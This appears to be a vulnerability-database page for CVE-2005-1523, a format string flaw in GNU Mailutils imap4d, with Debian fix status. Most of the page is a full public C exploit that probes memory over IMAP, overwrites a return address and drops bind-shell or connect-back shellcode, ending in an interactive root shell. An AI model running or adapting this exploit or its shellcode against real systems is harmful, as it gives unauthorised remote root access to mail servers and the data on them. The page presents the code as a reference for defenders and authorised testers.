CVE-2005-1523
unknown
CVSS v3
—
CVSS v4 NEW
—
VIR risk
1.0
Description
Format string vulnerability in imap4d server in GNU Mailutils 0.5 and 0.6, and other versions before 0.6.90, allows remote attackers to execute arbitrary code via format string specifiers in the command tag for IMAP commands.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
GNU Mailutils imap4d 0.6 - Remote Format String
/* mu-imap4d_fsexp.c
*
* GNU Mailutils imap4d v0.6 remote format string exploit
* by CoKi <coki@nosystem.com.ar>
*
* Original Reference:
* http://www.idefense.com/application/poi/display?id=246&type=vulnerabilities
*
* coki@nosystem:/home/coki/audit$ ./mu-imap4d_fsexp
*
* GNU Mailutils imap4d v0.6 remote format string exploit
* by CoKi <coki@nosystem.com.ar>
*
* use: ./mu-imap4d_fsexp -h <target_host> [-p <target_port>]
* ./mu-imap4d_fsexp -h <target_host> -c <your_host> [-b <your_port>]
*
* -p target imapd port (143 by default)
* -c your host/ip
* -b your port (45295 by default)
*
* coki@nosystem:/home/coki/audit$ ./mu-imap4d_fsexp -h 10.0.0.1
*
* GNU Mailutils imap4d v0.6 remote format string exploit
* by CoKi <coki@nosystem.com.ar>
*
* [*] verifying host : 10.0.0.1
* [*] imapd port : 143
* [*] connecting... : done!
*
* [*] getting target info...
* [*] buffer address : 0x08059810
* [*] shellcode address : 0x080599a0
* [*] basic return address : 0xbffffa28
*
* [*] searching ret address... : 0xbffff988
*
* [!] you have a shell :)
*
* Linux firewall 2.4.31 #1 SMP Wed Jun 22 23:13:19 ART 2005 i586 unknown
* uid=0(root) gid=12(mail) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
*
* Tested in Slackware Linux 9.0 / 10.0 / 10.1
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define BUFFERSIZE 2048
#define ERROR -1
#define TIMEOUT 3
#define PORTBIND 5074
#define CONNBACK 45295
#define IMAPD 143
void use(char *program);
int check(unsigned long addr);
int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout);
void exploit(char *host, unsigned int imapdport);
void shell(char *host, unsigned port);
void getinfo(char *host, unsigned int imapdport);
int chkshaddr(char *host, unsigned int imapdport, int i);
/*
* s0t4ipv6@Shellcode.com.ar
* x86 portbind a shell in port 5074
* 92 bytes.
*/
char port_bind[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40"
"\x50\x89\xe1\xb0\x66\xcd\x80\x31"
"\xd2\x52\x66\x68\x13\xd2\x43\x66"
"\x53\x89\xe1\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x40\x89\x44"
"\x24\x04\x43\x43\xb0\x66\xcd\x80"
"\x83\xc4\x0c\x52\x52\x43\xb0\x66"
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd"
"\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1"
"\xb0\x0b\xcd\x80";
/*
* BSD x86 shellcode by eSDee of Netric (www.netric.org)
* 124 byte - connect back shellcode (port=0xb0ef)
*/
char conn_back[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\xff\xff\xff\xff\x66\x68\xff"
"\xff\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
int bretaddr=0, shaddr=0;
unsigned int pos=0, cback=0, shsize;
unsigned short rport=CONNBACK;
in_addr_t rhost=0;
int main(int argc, char *argv[]) {
char opt, *host=NULL, *rh=NULL;
int sockfd;
unsigned int imapdport=IMAPD;
struct hostent *he;
struct sockaddr_in dest_dir;
printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'p':
imapdport = atoi(optarg);
break;
case 'c':
rhost = inet_addr(optarg);
rh = optarg;
cback++;
break;
case 'b':
rport = atoi(optarg);
break;
default:
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(cback) {
printf(" [*] verifying your host\t:");
fflush(stdout);
if((he=gethostbyname(rh)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
shsize = strlen(conn_back);
conn_back[33]=(rhost & 0x000000ff);
conn_back[34]=(rhost & 0x0000ff00) >> 8;
conn_back[35]=(rhost & 0x00ff0000) >> 16;
conn_back[36]=(rhost & 0xff000000) >> 24;
conn_back[39]=(rport & 0xff00) >> 8;
conn_back[40]=(rport & 0x00ff);
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] connect back port\t\t: %u\n", rport);
}
if(strlen(conn_back) < shsize) {
printf("\n [!] failed! your host or port contain null-bytes\n\n");
exit(1);
}
printf(" [*] verifying target host\t:");
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] target imapd port\t\t: %u\n\n", imapdport);
printf(" [*] connecting...\t\t:");
fflush(stdout);
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket()");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
printf(" done!\n\n");
getinfo(host, imapdport);
exploit(host, imapdport);
}
int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout) {
int res, slen, flags;
struct timeval tv;
struct sockaddr_in addr;
fd_set rdf, wrf;
fcntl(sfd, F_SETFL, O_NONBLOCK);
res = connect(sfd, serv_addr, addrlen);
if (res >= 0) return res;
FD_ZERO(&rdf);
FD_ZERO(&wrf);
FD_SET(sfd, &rdf);
FD_SET(sfd, &wrf);
bzero(&tv, sizeof(tv));
tv.tv_sec = timeout;
if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
return -1;
if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
slen = sizeof(addr);
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
return -1;
flags = fcntl(sfd, F_GETFL, NULL);
fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);
return 0;
}
return -1;
}
void shell(char *host, unsigned int port) {
int sockfd, n;
char buff[BUFFERSIZE], *command = "uname -a; id;\n";
fd_set readfs;
struct hostent *he;
struct sockaddr_in dest_dir;
he=gethostbyname(host);
sockfd=socket(AF_INET, SOCK_STREAM, 0);
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(port);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf("\r\r");
}
else {
printf("\n\n [!] you have a shell :)\n\n");
fflush(stdout);
send(sockfd, command, strlen(command), 0);
while(1) {
FD_ZERO(&readfs);
FD_SET(0, &readfs);
FD_SET(sockfd, &readfs);
if(select(sockfd+1, &readfs, NULL, NULL, NULL) < 1) exit(0);
if(FD_ISSET(0,&readfs)) {
if((n = read(0,buff,sizeof(buff))) < 1)
exit(0);
if(send(sockfd, buff, n, 0) != n) exit(0);
}
if(FD_ISSET(sockfd,&readfs)) {
if((n = recv(sockfd, buff, sizeof(buff), 0)) < 1) exit(0);
write(1, buff, n);
}
}
}
}
void getinfo(char *host, unsigned int imapdport) {
char recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;
struct hostent *he;
struct sockaddr_in dest_dir;
int sockfd, i;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" [*] getting target info...\n");
fflush(stdout);
for(i=1; i<50; i++) {
bzero(recvbuf, sizeof(recvbuf));
sockfd=socket(AF_INET, SOCK_STREAM, 0);
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT);
read(sockfd, recvbuf, sizeof(recvbuf));
memset(evilcmd, 0x00, sizeof(evilcmd));
memset(evilcmd, 0x41, 496);
strcat(evilcmd, "BBBBBBBBBBBB");
sprintf(temp, ".%%%u$.8p\n", i);
strcat(evilcmd, temp);
write(sockfd, evilcmd, strlen(evilcmd));
read(sockfd, recvbuf, sizeof(recvbuf));
close(sockfd);
addr = strstr(recvbuf, ".");
if(pos == 0) if(strstr(addr, "42424242")) pos = i;
if(shaddr == 0) {
if(strstr(addr, "0x08")) {
if(chkshaddr(host, imapdport, i)) {
shaddr = strtoul(++addr, 0, 0);
printf(" [*] buffer address\t\t: %.8p\n", shaddr);
shaddr += 350;
printf(" [*] shellcode address\t\t: %.8p\n", shaddr);
}
}
}
if(bretaddr == 0) {
if(strstr(addr, "0xbf")) {
bretaddr = strtoul(++addr, 0, 0);
printf(" [*] basic return address\t: %.8p\n", bretaddr);
}
}
if(pos != 0 && shaddr != 0 && bretaddr != 0) break;
}
if(shaddr == 0) {
printf(" [*] shellcode address\t\t: not found!\n\n");
exit(1);
}
if(bretaddr == 0) {
printf(" [*] basic return address\t: not found!\n\n");
exit(1);
}
printf("\n");
}
int chkshaddr(char *host, unsigned int imapdport, int i) {
char recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;
struct hostent *he;
struct sockaddr_in dest_dir;
int sockfd;
he=gethostbyname(host);
bzero(recvbuf, sizeof(recvbuf));
sockfd=socket(AF_INET, SOCK_STREAM, 0);
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT);
read(sockfd, recvbuf, sizeof(recvbuf));
memset(evilcmd, 0x00, sizeof(evilcmd));
memset(evilcmd, 0x41, 496);
strcat(evilcmd, "BBBBBBBBBBBB");
sprintf(temp, "%%%u$s\n", i);
strcat(evilcmd, temp);
write(sockfd, evilcmd, strlen(evilcmd));
read(sockfd, recvbuf, sizeof(recvbuf));
close(sockfd);
if(strstr(recvbuf, "$s")) return 1;
else return 0;
}
void exploit(char *host, unsigned int imapdport) {
char evilcmd[BUFFERSIZE], temp[BUFFERSIZE], recvbuf[BUFFERSIZE];
int cn1, cn2, cn3, cn4, sockfd, retaddr;
unsigned int bal1, bal2, bal3, bal4;
struct hostent *he;
struct sockaddr_in dest_dir;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
for(retaddr=bretaddr; retaddr>=(bretaddr-500); retaddr -= 4) {
printf(" [*] searching ret address...\t: %010p", retaddr);
fflush(stdout);
bzero(evilcmd, sizeof(evilcmd));
memset(evilcmd, 0x90, 496);
if(cback) memcpy(evilcmd + 350, conn_back, strlen(conn_back));
else memcpy(evilcmd + 350, port_bind, strlen(port_bind));
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
retaddr++;
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
retaddr++;
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
bal1 = (shaddr & 0xffff0000) >> 16;
bal2 = (shaddr & 0x0000ffff);
cn1 = bal2 - 496 - 12;
cn1 = check(cn1);
cn2 = bal1 - bal2;
cn2 = check(cn2);
sprintf(temp, "%%%du%%%u$n%%%du%%%u$n", cn1, pos, cn2, pos+2);
strcat(evilcmd, temp);
strcat(evilcmd, "\n");
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
if (read(sockfd, recvbuf, sizeof(recvbuf)) <= 0) {
perror(" read()");
printf("\n");
exit(1);
}
if (write(sockfd, evilcmd, strlen(evilcmd)) <= 0) {
perror(" write()");
printf("\n");
exit(1);
}
close(sockfd);
if(cback) {
printf("\r\r");
continue;
}
else shell(host, PORTBIND);
retaddr -= 2;
}
if(cback) printf("\n\n [!] finished!\n\n");
else printf("\n\n [!] failed!\n\n");
}
int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 10)
addr = addr + 65536;
return addr;
}
void use(char *program) {
printf(" use: %s -h <target_host> [-p <target_port>]\n", program);
printf(" %s -h <target_host> -c <your_host> [-b <your_port>]\n\n", program);
printf(" -p target imapd port (143 by default)\n");
printf(" -c your host/ip\n");
printf(" -b your port (45295 by default)\n\n");
exit(1);
}
// milw0rm.com [2005-08-01]OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1:0.6.1-3 |
| sid | Fixed | 1:0.6.1-3 |
| forky | Fixed | 1:0.6.1-3 |
| bullseye | Fixed | 1:0.6.1-3 |
| bookworm | Fixed | 1:0.6.1-3 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.